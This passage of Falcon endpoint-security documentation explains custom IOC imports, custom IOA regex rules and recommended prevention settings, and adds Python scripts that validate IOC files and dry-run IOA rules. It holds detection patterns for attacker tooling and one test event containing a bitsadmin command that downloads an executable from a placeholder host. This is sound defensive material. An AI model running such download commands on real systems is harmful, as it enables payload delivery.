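"""Pre-flight validation for Falcon custom IOC import files (CSV and JSON)."""
import csv
import io
import json
from datetime import date, datetime, time, timezone

TYPES = {"sha256", "md5", "domain", "all_subdomains", "ipv4", "ipv6"}
PLATFORMS = {"windows", "mac", "linux", "android", "ios"}
MOBILE = {"android", "ios"}
ACTIONS = {"prevent", "prevent_no_ui", "detect", "allow", "no_action"}
SEVERITIES = {"critical", "high", "medium", "low", "informational"}
LIST_COLUMNS = {"platforms", "host_groups", "tags"}


def csv_row_to_indicator(row):
    """Normalise one csv.DictReader row into the dict shape the JSON file uses."""
    ind = {}
    for key, raw in row.items():
        # Column names match case-insensitively; comma lists are split;
        # metadata.filename becomes {"metadata": {"filename": ...}}.
        key, raw = (key or "").strip().lower(), (raw or "").strip()
        if not raw:
            continue
        if key in LIST_COLUMNS:
            ind[key] = [v.strip() for v in raw.split(",") if v.strip()]
        elif key == "applied_globally":
            ind[key] = raw.lower() == "true"
        elif key == "metadata.filename":
            ind.setdefault("metadata", {})["filename"] = raw
        else:
            ind[key] = raw
    return ind


def validate_indicator(ind):
    """Return the documented rules this indicator breaks (empty list = acceptable)."""
    errors = []
    if not ind.get("value"):
        errors.append("value is required")
    if ind.get("type") not in TYPES:
        errors.append(f"unsupported type {ind.get('type')!r}")
    platforms = set(ind.get("platforms") or [])
    if not platforms:
        errors.append("platforms is required")
    elif not platforms <= PLATFORMS:
        # A cell a spreadsheet quoted a second time shows up here as a platform
        # name that still carries a literal quotation mark.
        errors.append(f"unsupported platforms {sorted(platforms - PLATFORMS)}")
    if ind.get("type") == "all_subdomains" and not platforms <= MOBILE:
        errors.append("all_subdomains applies to mobile platforms only")
    if ind.get("host_groups") and ind.get("applied_globally") is True:
        errors.append("applied_globally must be false when host_groups are given")
    if not ind.get("host_groups") and ind.get("applied_globally") is not True:
        errors.append("applied_globally must be true when no host_groups are given")
    action = ind.get("action")
    if platforms - MOBILE and action not in ACTIONS:
        errors.append(f"action is required for windows/mac/linux, got {action!r}")
    if platforms & MOBILE and ind.get("mobile_action") not in ACTIONS:
        errors.append("mobile_action is required for android/ios")
    if action in {"prevent", "detect"} and ind.get("severity") not in SEVERITIES:
        errors.append(f"severity is required when action is {action}")
    if "expiration" in ind:
        try:
            date.fromisoformat(ind["expiration"])
        except ValueError:
            errors.append(f"expiration {ind['expiration']!r} is not a YYYY-MM-DD date")
    return errors


def is_active(ind, now=None):
    """True while the action still applies: indicators expire at 23:59 UTC on the
    expiration date. `now` may be a datetime or an ISO-8601 string."""
    if "expiration" not in ind:
        return True
    now = datetime.fromisoformat(now) if isinstance(now, str) else now or datetime.now(timezone.utc)
    cutoff = datetime.combine(date.fromisoformat(ind["expiration"]), time(23, 59), timezone.utc)
    return now < cutoff


def validate_csv(text):
    """Validate a CSV import file; returns [(indicator, errors), ...] in file order."""
    rows = csv.DictReader(io.StringIO(text))
    return [(ind, validate_indicator(ind)) for ind in map(csv_row_to_indicator, rows)]


def validate_json(text):
    """Validate a JSON import file, which is a list of indicator objects."""
    return [(ind, validate_indicator(ind)) for ind in json.loads(text)]


# Constructed sample (placeholder host group IDs): two well-formed rows, then
# three rows that each break a documented rule.
SAMPLE_CSV = "\n".join([
    "type,value,description,platforms,host_groups,applied_globally,severity,action,expiration,metadata.filename",
    'domain,wicar.org,"A domain to detect for testing","windows,linux",,true,medium,no_action,2022-03-17,',
    'sha256,1234567890123456789012345678901234567890123456789012345678901234,"A hash to block",windows,,true,high,prevent,,test.exe',
    'domain,test.org,"host groups plus applied_globally=true",windows,11115678901234567890123456781111,true,high,detect,,',
    'ipv4,192.168.0.1,"detect without severity and a bad date",windows,,true,,detect,2022-13-01,',
    'md5,aaaa567890123456789012345678aaaa,"platform cell quoted twice","""windows,mac""",,true,high,prevent,,',
])

if __name__ == "__main__":
    for ind, errs in validate_csv(SAMPLE_CSV):
        print(ind["value"], "OK" if not errs else errs)
```

Run it on an export before uploading; the last sample row is what a spreadsheet produces when it wraps an already-quoted "windows,mac" cell in a second set of quotation marks, and the validator surfaces it as an unknown platform rather than letting the row fail silently in the console.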

Custom IOC configuration fields

Configure these settings when adding or editing custom IOCs. The specific settings available vary by indicator type.

Field Description

Filename

(Optional) Applies to hashes only. Enter a common filename or a filename in your environment. Filenames can be helpful for identifying hashes or filtering custom IOCs.

Host group

Specify which host groups to apply the settings to, or select All hosts to apply the settings to all hosts.

Platform

Specify which platforms to apply the settings to.

Action

Select the action to take when the sensor observes the matching indicator on a Windows, Mac, or Linux host in your environment.

  • Block: Applies to hashes only. Block the indicator and show it as a detection.

  • Block, hide detection: Applies to hashes only. Block and detect the indicator, but hide it from Endpoint security > Monitor > Endpoint detections. Discover this activity by searching for the indicator value in Investigate.

  • Detect only: Applies to all indicator types. Show the indicator as a detection and take no other action.

  • Allow: Applies to hashes only. Add the indicator to your allowlist and do not detect it.

  • None: Applies to all indicator types. Save the indicator for future use, but take no action.

Note: If you assign a Block action to a hash, you must also enable the Custom Blocking setting in Prevention Policies.

Mobile action

Select the action to take when an Android or iOS sensor observes the matching indicator on a host in your environment.

  • Block: Block the indicator and show it as a detection.

  • Block, hide detection: Block and detect the indicator, but hide it from Endpoint security > Monitor > Mobile detections. You can still view events related to blocked connections in Investigate > Search > Advanced event search.

  • Detect only: Show the indicator as a detection and take no other action.

  • Allow: Add the indicator to your allowlist and do not detect it.

  • None: Save the indicator for future use, but take no action.

Severity

Required if Action is set to Block or Detect only. Specify a custom severity level for the indicators. The Severity options vary depending on which Action value you selected.

  • Informational
  • Low
  • Medium
  • High
  • Critical

Expiration date

(Optional) Specify when the indicator will become inactive.

When an indicator expires, its action is set to None but it remains in your list of custom IOCs. Indicators expire at 23:59 UTC on the specified date.

Tags

(Optional) Apply one or more custom tags to the indicators to help make the IOCs more maintainable and filterable. For example, you might use tags to link IOCs to specific tickets, filter groups, or external sources.

Audit log comment

(Recommended) Enter a comment to include in the IOC audit log.

We recommend that you include a comment for the audit log whenever you add, edit, or delete an indicator.

Custom IOA rules
Overview

While CrowdStrike's machine learning and behavior-based detections, known as Indicators of Attack (IOAs), protect environments from malicious behaviors, each organization has its own circumstances and environment to monitor and protect. Add your own custom IOAs to your prevention policies to gain visibility into activity that Falcon does not detect or prevent on its own, including activity that isn't inherently malicious.

As a detection, a custom IOA provides visibility into undesirable behaviors you need to know about. With the addition of a Kill or Block action, a custom IOA can stop or prevent a specific behavior.

Requirements

  • Subscription: Custom IOAs are available with Falcon Insight XDR. Customers with both Falcon Insight XDR and Falcon Prevent can also enable Block and Kill actions.

  • Sensor support:

    • Falcon sensor for Windows version 5.13 and later supports all rule types

    • Falcon sensor for Mac:

      • 5.13 and later supports Process Creation and Network Connection rules

      • 5.14 and later supports File Creation rules

      • 7.33 and later supports Domain Name rules

    • Falcon sensor for Linux:

      • 5.30 and later supports Process Creation rules

      • 6.45 and later supports File Creation rules

      • 7.31 and later supports Domain Name rules

      • 7.33 and later supports Network Connection rules

    Note: Falcon Container does not support custom IOA rules for pods.

  • Roles:

    • These roles can create and edit custom IOAs and can also assign rule groups to prevention policies:

      • Custom IOAs Manager
      • Falcon Administrator

    • These roles can view detections and preventions triggered by IOAs:

      • All roles that have access to detections and preventions

Understand custom IOA rules and rule groups

What are rules and how are they applied?

Individual custom IOA rules use a supported subset of regular expression syntax to define which activity triggers a custom IOA detection and whether that activity is also blocked or killed.

Note: Custom IOAs don’t allow you to allowlist or customize CrowdStrike’s IOAs.

Rules are created within rule groups which are added to prevention policies. You can create a collection of any number of the same or different rule types within a rule group. Each individual rule is evaluated independently. If a behavior on a host matches multiple rules, it will register detections corresponding to each matched rule.

Implementation overview

Assign custom IOA rule groups to prevention policies to see custom detections and preventions. Implementing a new custom IOA to trigger detections on your hosts involves four key steps:

  1. Create a rule group

  2. Add the custom IOA rule to the rule group

  3. Enable the rule and rule group

  4. Assign the rule group to a prevention policy

Rule versioning

Each time you edit a rule, it’s saved with a new version number so you can distinguish detections from different versions of the same rule and refer back to the parameters defined in each version. Read more in Edit a rule.

Rule duplication

To maintain clarity around the rules and their impact on your environment, each rule stands alone and cannot be reused in more than one rule group. However, they can easily be duplicated and saved into a different rule group. The ability to duplicate the parameters of a rule is also useful when creating similar rules. Read more in Duplicate a rule.

Safeguards and testing

Improper implementation of a custom IOA rule could cause a major outage that requires manual remediation. CrowdStrike has certain safeguards in place to reduce the risk of creating a rule that would kill a critical process, but be aware of the potential impact custom IOAs might have on your environment.

We recommend you always test new custom IOA rules on a small set of test hosts (e.g. in a lab or QA environment) and start simple with a single populated field and a detection-only action. Use this testing to confirm the desired behavior before building out the rule or applying it to a production environment and/or configuring it to prevent by using a block or kill action.

Manage custom IOA rules

Create a rule group

Each custom IOA rule is applied as part of a rule group. To create a rule group:

  1. Go to Endpoint security > Configure > Custom IOA rule groups.


    Screenshot of the Custom IOA Rule Groups page
  2. On the Custom IOA Rule Groups page, click Create rule group.

    Note: If you are making a rule based on an existing rule, you can start by duplicating the rule. See duplicate a rule.

    Screenshot of the Create new rule group dialog
  3. In the Create new rule group dialog, give your rule group a descriptive name. The Platform can be Windows, Mac, or Linux, as the rule group will be applied to hosts by using a Windows, Mac, or Linux prevention policy.

  4. Click Add Group.

Add a custom IOA rule

The details of custom IOAs are defined in individual rules, created within rule groups. To add a rule:

  1. Go to the Endpoint security > Configure > Custom IOA rule groups page and click Edit icon for the rule group where you’ll add your new rule. This takes you to its Rule group details page.


    Screenshot of the Custom IOA Rule group details page
  2. On the Rule group details page, click Add new rule. The Add new rule dialog displays.


    Screenshot of the basic fields in the Add new rule dialog
  3. In the Rule dialog fields, define the rule, including its type, action, and severity, and what it will detect.

  4. Click Check all Syntax to validate the regex syntax you’ve entered, and fix any indicated errors. This check validates that the syntax is correct, but doesn't test its functionality against a test string. That functional testing will be added in the future.

  5. Click Save.

Rule dialog basic information fields

The dialog options vary depending on rule type.

Rule Type: Select a rule type. The supported rule types vary by OS.

Rule type                          Windows   macOS   Linux
Process Creation                   Yes       Yes     Yes
File Creation                      Yes       Yes     Yes
Network Connection (IPv4, IPv6)    Yes       Yes     Yes
Domain Name                        Yes       Yes     Yes

Note: Domain Name rules rely on DnsRequest events. On macOS and Linux, if these events are not generated, a Domain Name rule will not trigger. Several factors can prevent these events on Linux, including DNS-over-TCP, DNS-over-HTTPS, and certain resolver configurations. macOS 13 and later use Secure DNS by default, which can in some instances prevent the sensor from raising detections. You can test whether a domain name rule fires with tools such as nslookup or dig.

Action to take. Specify a rule action:

  • Monitor

  • Detect

  • Block Execution

  • Kill Process. For File Creation, Network Connection, and Domain Name rule types, the Kill Process action does not always prevent the activity from happening, because the initiating process is sometimes killed after the activity has already occurred.

If you specify a Monitor rule action, a matched rule emits only an informational event that corresponds to the rule type. No other indication is visible in the Falcon console. You can search the Investigate app for the corresponding events:

Rule type                          Event name
Process Creation                   CustomIOABasicProcessDetectionInfoEvent
File Creation                      CustomIOAFileWrittenDetectionInfoEvent
Network Connection (IPv4, IPv6)    CustomIOANetworkConnectionDetectionInfoEvent
Domain Name                        CustomIOADomainNameDetectionInfoEvent

The supported prevention actions vary depending on rule type:

Rule type             Prevention action
Process Creation      Block Execution
File Creation         Kill Process
Network Connection    Kill Process
Domain Name           Kill Process

Severity: Select the level for this type of detection to fit with your organization’s workflows.

  • Critical

  • High

  • Medium

  • Low

  • Informational

Rule Name: Give this detection a name that will be recognizable when monitoring custom IOA detections and preventions in the Activity app.

Rule Description: Enter information about why this detection exists, how a responder might follow up on a detection triggered by this rule, and so on.

Comment for Audit Log: Enter information about what you’ve changed in the rule’s parameters from the previous version.

Rule dialog regex fields

The four different rule types provide unique detection parameters that can be configured using regex in their fields. For more info, see Supported regex syntax.

The regex fields shown by default are “include” fields containing a wildcard expression. Each of these fields has options to expand and define parameters in a counterpart “exclude” field.

  • At least one "include" field must be manually populated with something that is not a wildcard expression. By default, all untouched "include" fields are wildcarded and all untouched "exclude" fields are empty.

  • All regex fields are case insensitive.

  • Write each expression to describe the entire field value, as the reference examples below do: they begin with .* or .+ (for example .+\\bitsadmin\.exe) rather than a bare substring such as bitsadmin\.exe.

See example custom IOA rule field parameters for each rule type.


Screenshot showing the rule dialog common regex fields

All rule types have these “include” fields and their “exclude” counterparts:

  • Grandparent Image Filename

  • Grandparent Command Line

  • Parent Image Filename

  • Parent Command Line

  • Image Filename

  • Command Line

File Creation, Network Connection, and Domain Name rule types also have type-specific fields.

File Creation unique regex fields:

  • File Path (and exclusion)

  • File Type: deselect file types to exclude them.

File type   Windows   macOS   Linux
PE          Yes       Yes     Yes*
PDF         Yes       Yes     Yes
OLE         Yes       Yes     Yes
RTF         Yes       Yes     Yes
ZIP         Yes       Yes     Yes
JAR         Yes       Yes     Yes
OOXML       Yes       Yes     Yes
DOCX        Yes       Yes     Yes
XLSX        Yes       Yes     Yes
PPTX        Yes       Yes     Yes
VSDX        Yes       Yes     Yes
RAR         Yes       Yes     Yes
DMP         Yes       Yes     Yes
7ZIP        Yes       Yes     Yes
DWG         Yes       No      No
IDW         Yes       No      No
DXF         Yes       No      No
SLD         Yes       No      No
CAB         Yes       Yes     Yes
MACHO       Yes       Yes     Yes
TAR         Yes       Yes     Yes
XAR         Yes       Yes     Yes
BZIP2       Yes       Yes     Yes
SCRIPT      Yes       Yes     Yes
ELF         No        No      Yes
ESE         Yes       No      No
GZIP        No        No      Yes
OTHER       Yes       Yes     Yes

Note: * PE file creation on Linux requires sensor version 6.46 or later.

Network Connection unique regex fields:

  • Remote IP Address (and exclusion)

  • Remote TCP/UDP Port (and exclusion)

  • Connection Type:

    • TCP-TCP

    • UDP-UDP

    • ICMP-ICMP (Ping) (Windows-only)

      The Windows ping.exe utility cannot be used to test ICMP-type rules because ping.exe uses the ICMP API instead of creating ICMP packets directly. However, you can use other methods to generate ICMP packets, such as a Python script that builds them on a raw socket. To detect adversarial activity that leverages ping.exe, use the Process Creation rule type instead.


screenshot of the rule dialog for network connection rule type-specific fields

Domain Name unique regex fields (Windows; Linux sensor 7.31 and later; Mac sensor 7.33 and later):

  • Domain Name (and exclude)


screenshot of the rule dialog for domain name rule type-specific field

Supported regex syntax

Symbol and purpose, with an example where one helps:

  • .  Any character. Matches any single character.

  • []  Range of characters. Example: [1-5a-fx] matches one character in the range 1 to 5, 'a' to 'f', or 'x'.

  • [^]  Negated range of characters. Example: t[^eo]d matches "t", then one character that is not "e" or "o", then "d" (so "tad" matches but "ted" does not).

  • {}  Multiplier. {n} matches exactly n of the preceding item; {n,m} matches between n and m of the preceding item; {n,} matches n or more of the preceding item.

  • ()  Grouping. Groups a sub-expression so that a following multiplier applies to the whole group. Example: a(bc)?d matches "ad" and "abcd".

  • *  Multiplier. Matches zero or more of the preceding item.

  • ?  Multiplier. Matches zero or one of the preceding item.

  • +  Multiplier. Matches one or more of the preceding item.

  • |  Alternation. Matches what is on either the left or the right of the vertical bar.

  • \w \W  Word character. \w matches any word character (A-Z, a-z, 0-9 and _); \W matches any character that is not a word character.

  • \s \S  Whitespace. \s matches any whitespace character (space, tab, and so on); \S matches any character that is not whitespace.

  • \d \D  Digit. \d matches any digit (0-9); \D matches any character that is not a digit.

  • \n  Newline. Matches a line feed.

  • \r  Carriage return. Matches a carriage return.

  • \t  Tab. Matches a tab.

  • \  Escape. Removes the special meaning of the next character. Example: \. matches a literal period.

  • \xNN \x{NNNNN}  Unicode character code. Example: \x{1D11E} matches the character with hexadecimal Unicode code point U+1D11E.

Example custom IOA rule field parameters

Process Creation Rule Type

To detect cscript.exe launching bitsadmin.exe in order to download a file from the internet:

Field                        Value
Grandparent ImageFileName    .*
Grandparent CommandLine      .*
Parent ImageFileName         .+\\cscript\.exe
Parent CommandLine           .*
ImageFileName                .+\\bitsadmin\.exe
CommandLine                  .*/transfer.*https?://.*

File Creation

To detect Outlook launching MS Word that runs PowerShell that writes an .ISO file to the content.outlook temp folder:

Field                        Value
Grandparent ImageFileName    .+\\outlook\.exe
Grandparent CommandLine      .*
Parent ImageFileName         .+\\winword\.exe
Parent CommandLine           .*
ImageFileName                .+\\powershell\.exe
CommandLine                  .+new.+type.+itemtype.+file.+
File Path                    .+\\content\.outlook\\.+\.iso

To detect services.exe using svchost.exe (without arguments) to write a specific file path to programdata:

Field                        Value
Grandparent ImageFileName    .*
Grandparent CommandLine      .*
Parent ImageFileName         .+\\services\.exe
Parent CommandLine           .*
ImageFileName                .+\\svchost\.exe
CommandLine                  .+svchost\.exe\s?
File Path                    .+\\programdata\\.+[abc]{3}.+[1-3]{4}\.dat

Network Connection (IPv4, IPv6)

To detect any process that tries to connect to a known bad IP address:

Field                        Value
Grandparent ImageFileName    .*
Grandparent CommandLine      .*
Parent ImageFileName         .*
Parent CommandLine           .*
ImageFileName                .*
CommandLine                  .*
Remote IP Address            192\.168\.1\.254
Remote TCP/UDP Port          .*

To cover a range of addresses instead of a single host, for example 192.168.0.1 through 192.168.0.254, use alternation in the Remote IP Address field: 192\.168\.0\.([1-9]|[1-8][0-9]|9[0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-4])

Domain Name

To detect any process that tries to reach a known bad domain name:

Field                        Value
Grandparent ImageFileName    .*
Grandparent CommandLine      .*
Parent ImageFileName         .*
Parent CommandLine           .*
ImageFileName                .*
CommandLine                  .*
Domain Name                  domain\.com
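
Because the console's syntax check does not yet run an expression against a test string, it helps to dry-run a rule offline before assigning it to a policy. The script below is an added example, not CrowdStrike code and not how the sensor is implemented: it takes rules in the shape of the field tables above, compiles each field with Python's re module, and reports which rules a constructed event matches. It makes two assumptions, stated again in the code: every include expression must match the whole field value (the reference examples all begin with .* or .+ and untouched fields default to .*), and a matching exclude expression suppresses the rule. Python's re accepts constructs outside the supported-syntax table (anchors, lookarounds, \b, back-references), so a small guard rejects those before a rule is trusted. The event field names, the sample events, and the backupagent.exe exclusion are inventions for this example.

```python
import re

# Field names mirror the rule dialog; type-specific fields apply only to their rule type.
COMMON_FIELDS = ("GrandparentImageFileName", "GrandparentCommandLine",
                 "ParentImageFileName", "ParentCommandLine", "ImageFileName", "CommandLine")
TYPE_FIELDS = {"Process Creation": (), "File Creation": ("FilePath",),
               "Network Connection": ("RemoteIP", "RemotePort"), "Domain Name": ("DomainName",)}


def is_supported(pattern):
    """Reject constructs missing from the supported-syntax table (assumption: the
    sensor does not accept anchors, lookarounds, \\b, \\A, \\Z or back-references)."""
    i, in_class = 0, False
    while i < len(pattern):
        c = pattern[i]
        if c == "\\":                      # an escape consumes the next character
            if i + 1 < len(pattern) and pattern[i + 1] in "bBAZ123456789":
                return False
            i += 2
            continue
        if c == "[":
            in_class = True                # ^ inside [...] is the documented negation
        elif c == "]":
            in_class = False
        elif not in_class and (c in "^$" or pattern.startswith("(?", i)):
            return False
        i += 1
    return True


def compile_rule(rule):
    """Compile include/exclude expressions; untouched include fields default to '.*'."""
    compiled = {}
    for field in COMMON_FIELDS + TYPE_FIELDS[rule["type"]]:
        include, exclude = rule.get(field, ".*"), rule.get(field + ".exclude", "")
        for pattern in (include, exclude):
            if not is_supported(pattern):
                raise ValueError(f"{rule['name']}: {field}: unsupported syntax in {pattern!r}")
        compiled[field] = (re.compile(include, re.IGNORECASE),
                           re.compile(exclude, re.IGNORECASE) if exclude else None)
    return compiled


def rule_matches(rule, event):
    """Assumptions: the whole field value must match (hence the leading .* / .+ in
    the reference examples) and a matching exclude expression suppresses the rule."""
    if rule["type"] != event["type"]:
        return False
    for field, (include, exclude) in compile_rule(rule).items():
        value = event.get(field, "")
        if not include.fullmatch(value) or (exclude and exclude.fullmatch(value)):
            return False
    return True


def evaluate(rules, event):
    """Rules are evaluated independently, so one event can raise several detections."""
    return [rule["name"] for rule in rules if rule_matches(rule, event)]


# Rules taken from the example field tables above; the exclusion on the
# network rule (a hypothetical approved backup tool) is added for illustration.
RULES = [
    {"name": "cscript launches bitsadmin download", "type": "Process Creation",
     "ParentImageFileName": r".+\\cscript\.exe", "ImageFileName": r".+\\bitsadmin\.exe",
     "CommandLine": r".*/transfer.*https?://.*"},
    {"name": "connection to 192.168.0.1-254", "type": "Network Connection",
     "RemoteIP": r"192\.168\.0\.([1-9]|[1-8][0-9]|9[0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-4])",
     "ImageFileName.exclude": r".+\\backupagent\.exe"},
    {"name": "known bad domain", "type": "Domain Name", "DomainName": r"domain\.com"},
]

# Constructed events in the shape the rule fields describe.
EVENTS = {
    "bits_download": {"type": "Process Creation",
                      "ParentImageFileName": r"C:\Windows\System32\cscript.exe",
                      "ImageFileName": r"C:\WINDOWS\System32\BITSADMIN.EXE",
                      "CommandLine": r"BITSADMIN /transfer job /download https://files.example/p.exe C:\Users\Public\p.exe"},
    "bits_list": {"type": "Process Creation",
                  "ParentImageFileName": r"C:\Windows\System32\cscript.exe",
                  "ImageFileName": r"C:\Windows\System32\bitsadmin.exe",
                  "CommandLine": "bitsadmin /list"},
    "conn_in_range": {"type": "Network Connection", "ImageFileName": r"C:\Tools\curl.exe",
                      "RemoteIP": "192.168.0.37", "RemotePort": "443"},
    "conn_excluded": {"type": "Network Connection", "ImageFileName": r"C:\Program Files\BackupAgent.exe",
                      "RemoteIP": "192.168.0.37", "RemotePort": "443"},
    "conn_out_of_range": {"type": "Network Connection", "ImageFileName": r"C:\Tools\curl.exe",
                          "RemoteIP": "192.168.0.1000", "RemotePort": "443"},
    "dns": {"type": "Domain Name", "ImageFileName": "/usr/bin/curl", "DomainName": "DOMAIN.COM"},
}

if __name__ == "__main__":
    for name, event in EVENTS.items():
        print(f"{name}: {evaluate(RULES, event) or 'no detection'}")
```

The out-of-range event is the reason whole-value matching matters: 192.168.0.1000 contains a valid-looking prefix, and only a full match keeps the range expression honest. The mixed-case image names and domain exercise the documented case-insensitivity of every regex field.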

Enable or disable a rule or rule group

Like prevention policies, rules and rule groups must be enabled in order for them to trigger detections and preventions on hosts. Enable or Disable a rule group or an individual rule from the Rules tab of a Rule Group Details page ( Endpoint security > Configure > Custom IOA rule groups , click Edit icon for a rule group).

  • The option to Enable or Disable the rule group is in the top right corner.

  • Select rules to Enable and/or Disable them from the table header.

Edit a rule

Every field and parameter of a rule can be edited. Open the Edit rule dialog by clicking Edit icon next to an individual rule ( Endpoint security > Configure > Custom IOA rule groups , expand a rule group, click Edit icon for a rule).

Each time a rule is edited, it is saved with a new version number. Expand the Rule Version list to select older versions and view the parameters defined in each. If you “revert” to an older version by saving when the fields are populated with an older version’s parameters, the newly-saved rule will still be assigned a new version number.


Screenshot of the Edit rule dialog showing multiple versions available from the rule version dropdown list

Duplicate a rule

To maintain clarity around rules and their impact on your environment, each custom IOA rule stands alone and cannot be reused in more than one rule group. However, they can easily be duplicated and saved into a different rule group.

To duplicate a rule go to the Rules tab of a Rule Group Details page ( Endpoint security > Configure > Custom IOA rule groups , click Edit icon for a rule group). In the Actions menu, click Duplicate rule icon for the rule you want to duplicate.

The Duplicate rule dialog displays with all fields populated to match the rule you are duplicating.


screenshot showing the duplicate rule dialog

Delete a rule or rule group

Rules and rule groups can be deleted from the Rules tab of a Rule Group Details page ( Endpoint Security > Configure > Custom IOA rule groups , click Edit icon for a rule group).

  • The option to delete the rule group is in the top right corner.

  • Select individual rules to delete them with the option in the table header.

Note: When you delete a custom IOA rule, you can still access its parameters from the Execution Details of a detection it triggered prior to being deleted.

screenshot showing the delete options on the Rule group details page
Assign a rule group to a prevention policy

In addition to enabling a rule and its rule group, the rule group must be assigned to a prevention policy or policies before it will trigger detections. Rule group policy assignment can be done from either a prevention policy or from a rule group.


two screenshots showing that you can access tabs for assigning custom ioa rule groups to prevention policies from policy details pages and custom ioa rule group details pages

Prevention policy Assigned Custom IOAs tab

To see the rule groups assigned to a prevention policy, go to that policy’s Assigned Custom IOAs tab. In the Actions column, you can go to Edit a rule group or Remove it from the list of custom IOA rule groups assigned to this prevention policy.


screenshot of Assigned Custom IOAs tab of a a prevention policy

Click Assign rule groups to add any currently unassigned rule groups to this prevention policy.

Note: Assigning a rule group to a policy does not change the rule group’s enabled or disabled status. Quickly get to a rule group’s details by clicking Edit icon in the Actions column to enable or disable it.

screenshot showing the dialog to assign a custom ioa rule group to a prevention policy

Custom IOA rule group Prevention Policies tab

To see the prevention policies a rule group is assigned to, go to that rule group's Prevention Policies tab. In the Actions column, you can edit a policy or remove the rule group from that policy.


screenshot showing an ioa rule group prevention policies tab

Click Assign to policies to assign the rule group to prevention policies it is not currently assigned to.


screenshot showing the assign to prevention policies dialog to add a custom ioa rule group to a prevention policy or policies
View the custom IOA audit log

The audit log holds the full revision history of each custom IOA rule and rule group. To reach it, click See audit log in the top right corner of the Custom IOA Rule Groups page.

Sort columns to group your view of the log. Logged revisions are defined in the Action column as Created, Updated, or Deleted.


The custom ioa detection execution details panel on the detections page of the Activity dashboard.

Click any revision to see its Details panel:

  • For updates to rule groups, the revision’s details include whether it was enabled or disabled.

  • When individual rules have been updated, see what the Version was before and after this revision, any audit log comments, and the detailed changes that were made.

Prevention Policy Settings

Look up setting recommendations and full details about each prevention policy setting.

Overview

CrowdStrike Falcon uses overlapping methods to detect both known and unknown threats. This helps ensure detection and prevention of attacks at multiple stages, and is also why enabling all of our recommended prevention policies is critical.

Standard playbook tactics for adversaries leverage privilege escalation and credential theft. These tactics enable lateral movement and exploitation or compromise of systems in your environment. Therefore, it’s vital that you have a view of activity across all potential attack phases. Enabling only 8 out of 10 policy toggles doesn’t mean you are 80% protected. If the one setting needed to detect a particular malicious attack in your environment is also the one that’s disabled, you're still potentially 100% vulnerable.

Note: Falcon Complete has its own prevention policies guidelines. Standard prevention policy recommendations might not align with Falcon Complete's recommended configurations.

Test all policy changes in pre-production first, and then deploy the changes to production in stages. You can triage detections and adjust settings as needed to see fewer false positives, using IOC management and machine learning and IOA exclusions. For more info, see Custom settings and configurations.

For new customers, we recommend a three-phase approach to configuring prevention policy settings. As of April 2022, Falcon Prevent and Falcon Insight XDR come with pre-configured editable prevention policies that provide these recommended settings.

When new prevention policy options are made generally available, we recommend that you incorporate them into your production environment using your standard change control methodology.

Note: We've updated the names of prevention policy settings to more accurately reflect their functionality. For more info, see Tech Alert | Prevention Policy Settings Naming Update.

Recommended prevention policy settings

Windows prevention policy setting recommendations
Settings are grouped by Type > Category; each entry lists the recommended setting for optimal protection.

Sensor Capabilities

  • End User Notifications: Customer preference
  • Unknown Executable Analysis and Unknown Detection-Related Executable Analysis: Enabled
  • Sensor Tamper Prevention: Enabled
  • Suspicious File QuickScan Pro Analysis: Customer preference

Sensor Visibility > Enhanced Visibility

  • Additional User Mode Data Visibility: Enabled
  • Interpreter-Only Visibility: Enabled
  • System Management Engine Visibility: Enabled
  • Script-Based Execution Visibility: Enabled
  • HTTP Visibility and Detection: Enabled
  • Redacted HTTP Detection Details: Customer preference
  • Hardware-Enhanced Exploit Detection: Enabled
  • Enhanced Exploitation Visibility: Enabled
  • Extended User Mode Data Visibility: Moderate
  • Enhanced DLL Load Visibility: Enabled
  • WSL 2 Visibility: Enabled

Sensor Visibility > Hardware-Enhanced Visibility

  • Memory Scanning with GPU: Enabled
  • Memory Scanning with CPU: Enabled

Sensor Visibility > Firmware

  • BIOS Firmware Deep Visibility: Enabled

Next-Gen Antivirus > Cloud Machine Learning

  • Cloud-Based Anti-Malware - Detection: Aggressive
  • Cloud-Based Anti-Malware - Prevention: Moderate+
  • Cloud-Based Adware & PUP - Detection: Aggressive
  • Cloud-Based Adware & PUP - Prevention: Moderate+

Next-Gen Antivirus > Microsoft Office File Macro Machine Learning

  • Cloud Anti-malware for Microsoft Office Files - Detection: Aggressive
  • Cloud Anti-malware for Microsoft Office Files - Prevention: Moderate+

Next-Gen Antivirus > Clean Infected Microsoft Office Files

  • Microsoft Office File Malicious Macro Removal: Customer preference

Next-Gen Antivirus > Sensor Machine Learning

  • Sensor-Based Anti-Malware - Detection: Aggressive
  • Sensor-Based Anti-Malware - Prevention: Moderate+
  • Enhanced machine learning for larger files: Enabled

Next-Gen Antivirus > On-Demand Scans Machine Learning

  • Cloud-based anti-malware on-demand scanning - Detection: Aggressive
  • Cloud-based anti-malware on-demand scanning - Prevention: Moderate+
  • Sensor-based anti-malware on-demand scanning - Detection: Aggressive
  • Sensor-based anti-malware on-demand scanning - Prevention: Moderate+
  • Cloud-based adware & PUP on-demand scanning - Detection: Aggressive
  • Cloud-based adware & PUP on-demand scanning - Prevention: Moderate+

Next-Gen Antivirus > On-Demand Scans

  • USB Insertion Triggered Scan: Enabled

Next-Gen Antivirus > On Write

  • Detect on Write: Enabled
  • Quarantine on Write: Enabled
  • On Write Script File Visibility: Enabled

Next-Gen Antivirus > Quarantine

  • Quarantine & Security Center Registration: Enabled
  • Quarantine on Removable Media: Enabled

Malware Protection > Execution Blocking

  • Custom Indicator Blocking: Enabled
  • Suspicious Process Prevention: Enabled
  • Suspicious Registry Operation Prevention: Enabled
  • Suspicious Script and Command Prevention: Enabled
  • Intelligence-Sourced Threat Prevention: Enabled
  • Driver Load Prevention: Enabled
  • Vulnerable Driver Protection: Enabled
  • Boot Configuration Database Protection: Enabled
  • File System Containment: Enabled

Behavior-based Prevention > Exploit Mitigation

  • ASLR Bypass Prevention: Enabled
  • DEP Bypass Prevention: Disabled
  • Heap Spray Pre-allocation Prevention: Enabled
  • NULL Page Allocation Prevention: Enabled
  • SEH Overwrite Prevention: Enabled

Behavior-based Prevention > Ransomware

  • Backup Deletion Prevention: Enabled
  • Cryptowall Prevention: Enabled
  • File Encryption Prevention: Enabled
  • Locky Prevention: Enabled

Behavior-based Prevention

Ransomware

File System Access Prevention

Enabled

Behavior-based Prevention

Ransomware

Volume Shadow Copy - Audit

Enabled

Behavior-based Prevention

Ransomware

Volume Shadow Copy - Protect

Enabled

Behavior-based Prevention

Exploitation Behavior

Application Exploitation Prevention

Enabled

